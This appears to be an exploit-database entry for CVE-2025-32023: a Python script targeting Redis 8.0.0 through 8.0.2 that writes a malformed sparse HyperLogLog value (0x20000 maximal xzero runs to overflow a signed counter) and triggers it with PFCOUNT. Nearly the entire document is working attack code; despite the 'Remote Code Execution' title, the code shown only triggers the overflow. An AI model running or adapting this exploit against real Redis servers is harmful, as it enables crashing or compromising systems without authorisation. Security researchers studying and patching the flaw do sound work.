Redis 8.0.2 Remote Code Execution

# Exploit Title: Redis RCE
# Redis 8.0.2 Remote Code Execution

# Exploit Title: Redis RCE
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/
# Version: Affects :>= 8.0.0, < 8.0.3
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-32023

import redis
import sys

# --- Configuration ---
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_KEY = 'hll:exp'

# HLL encoding type (1 = sparse)
HLL_SPARSE = 1


def p8(value):
"""Convert integer to single byte."""
return bytes([value])


def xzero(size):
"""
Construct an 'xzero' run for sparse HLL:
Creates a run-length encoding entry of zeroes with a specific size.
"""
if not (1 <= size <= 0x4000):
raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
size -= 1
return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)


def build_malformed_hll():
"""
Construct a malformed HLL payload that overflows internal counters.
"""
payload = b'HYLL' # Magic header
payload += p8(HLL_SPARSE) # Encoding type: sparse
payload += p8(0) * 3 # Reserved
payload += p8(0) * 8 # Unused (padding)

assert len(payload) == 0x10 # Check header size

# Append enough xzero runs to cause overflow
payload += xzero(0x4000) * 0x20000 # == -0x80000000 when cast to signed int

# Add one more run to complete the structure
payload += p8(0b11111111) # Runlen=4, regval=0x20 (but malformed)

return payload


def main():
try:
print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
r = redis.Redis(REDIS_HOST, REDIS_PORT)

print("[*] Building malformed HyperLogLog payload...")
hll_payload = build_malformed_hll()

print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
r.set(REDIS_KEY, hll_payload)

print("[*] Triggering HLL merge operation (pfcount)...")
r.pfcount(REDIS_KEY, REDIS_KEY)

print("[+] Exploit triggered successfully.")
except Exception as e:
print(f"[!] Exploit failed: {e}")
sys.exit(1)


if __name__ == "__main__":
main()